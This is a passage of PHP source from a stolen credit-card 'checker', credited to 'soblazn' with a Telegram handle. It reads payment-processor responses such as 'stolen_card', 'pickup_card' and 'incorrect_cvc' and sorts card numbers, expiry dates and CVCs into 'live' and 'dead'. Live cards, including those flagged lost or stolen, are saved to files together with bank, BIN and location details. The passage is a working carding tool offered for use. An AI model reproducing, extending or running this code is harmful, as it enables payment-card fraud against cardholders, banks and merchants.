    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CCN</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Lost Card </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>
';
}
elseif (strpos($result, "stolen_card" )) {saveStolenLives ("Live CCN (Stolen Card) -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CCN</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Stolen Card </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>
';
}
elseif (strpos($result, "Your card's security code is incorrect." )) {saveCCN ("Live CCN -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CCN</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Your card security code is incorrect </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_cvc" )) {saveCCN ("Live CCN -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CCN</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Incorrect CVC </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "pickup_card" )) {savePickupLives ("Live CCN (Pickup Card) -> $cc|$mon|$year|$cvv|$name | Checker Made By ♛ soblazn ♛  ");
    echo '<span class="badge badge-purple">#Aprovada </span></br> <span class="badge badge-purple">♛</span> <span class="badge badge-purple"> CC Details </span> <span class="badge badge-purple">♛</span></br> <span class="badge badge-purple">#Live CCN</span></br> <span class="badge badge-purple">CC = '.$cc.'</span></br></b><span class="badge badge-purple">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-purple">CVC = '.$cvv.'</span></br><span class="badge badge-purple">Code = Pickup Card </span></br><span class="badge badge-purple">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,"fraudulent")){
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Fraudulent </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has expired.')) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Your card has expired </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, 'security code is invalid.' )) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Security Code is Invalid </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "expired_card" )) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Expired Card </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card number is incorrect.')) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Your card number is incorrect </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_number")) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Incorrect Number </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "service_not_allowed")) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Service Not Allowed </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "do_not_honor")) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Do Not Honor </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, "generic_decline")) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Generic Decline </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card was declined.')) {
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Your Card was Declined </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unavailable"')){
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = CVC Unavailable </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unchecked"')){
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = CVC Unchecked </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "fail"')){
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = CVC Check Failed </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,"parameter_invalid_empty")){
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Parameter Invalid Empty </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span class="badge badge-green">Checker Made By = ♛ soblazn ♛ </span></br><span class="badge badge-green">Telegram Username = @soblazncc</span></br><span class="badge badge-green"></span></br></br><span class="badge badge-yellow">=================================================================================</span></br></br>';
}
elseif (strpos($result,"lock_timeout")){
    echo '<span class="badge badge-yellow">#Reprovada </span></br> <span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> CC Details </span> <span class="badge badge-yellow">♛</span></br> <span class="badge badge-yellow">#Dead Card</span></br> <span class="badge badge-yellow">CC = '.$cc.'</span></br></b><span class="badge badge-yellow">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-yellow">CVC = '.$cvv.'</span></br><span class="badge badge-yellow">Code = Lock Timeout </span></br><span class="badge badge-yellow">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Type = '.$bin.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-green">♛</span> <span class="badge badge-green"> Checker Details </span> <span class="badge badge-green">♛</span></br><span 